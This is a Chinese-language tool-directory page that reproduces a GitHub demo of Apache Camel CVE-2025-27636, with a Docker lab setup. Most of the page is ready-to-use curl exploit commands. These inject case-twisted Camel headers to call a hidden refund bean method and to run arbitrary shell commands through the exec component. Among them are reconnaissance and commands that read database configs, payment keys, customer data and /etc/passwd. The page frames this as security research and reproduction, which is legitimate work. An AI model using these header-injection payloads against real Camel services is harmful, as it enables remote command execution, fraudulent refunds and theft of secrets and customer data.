Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/crystallen1/cve-2025-27636-demo
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubcrystallen1/cve-2025-27636-demo

CVE-2025-27636-demo

演示 Apache Camel CVE-2025-27636,通过基于 Docker 的复现环境展示头部注入攻击,包括 Bean 方法注入和命令执行,用于安全研究与教育。

查看仓库
10个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Apache Camel CVE 演示

本项目演示 Apache Camel 中与头部注入攻击相关的安全漏洞。

Docker 构建

构建 Docker 镜像:

root@kitploit:~
docker build -t camel-cve-demo .

Docker 运行

运行容器并开放所有必要端口:

root@kitploit:~
docker run -d `
  --name camel-cve-demo `
  -p 8080:8080 `
  -p 8081:8081 `
  -p 8484:8484 `
  -v ${PWD}/logs:/app/logs `
  -e JAVA_OPTS="-Xmx512m -Xms256m" `
  camel-cve-demo

攻击复现

1. Bean 方法注入攻击

通过注入方法名利用易受攻击的端点:

root@kitploit:~
# 成功攻击 - 区分大小写的头部
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

# 备选方案 - 查询参数注入
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"

对比(以下应失败):

root@kitploit:~
# 错误的大小写 - 不应生效
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"

curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

2. 命令执行攻击

利用 exec 组件执行任意命令:

侦察:

root@kitploit:~
# 查看当前目录
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"

# 列出配置目录
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"

# 查找配置文件
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"

数据窃取:

root@kitploit:~
# 读取数据库配置
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"

# 读取支付密钥
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"

# 读取客户数据
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/data/customers/customers.csv"

# 读取审计日志
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/log/audit/audit.log"

# 读取系统用户
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/etc/passwd"

# 列出进程
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs:aux"

验证攻击结果

在容器内查看攻击日志:

root@kitploit:~

# 查看未经授权的退款尝试
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt

端口

  • 8080:主应用程序(前端)
  • 8081:Bean 注入易受攻击的端点
  • 8484:Exec 注入易受攻击的端点
下载工具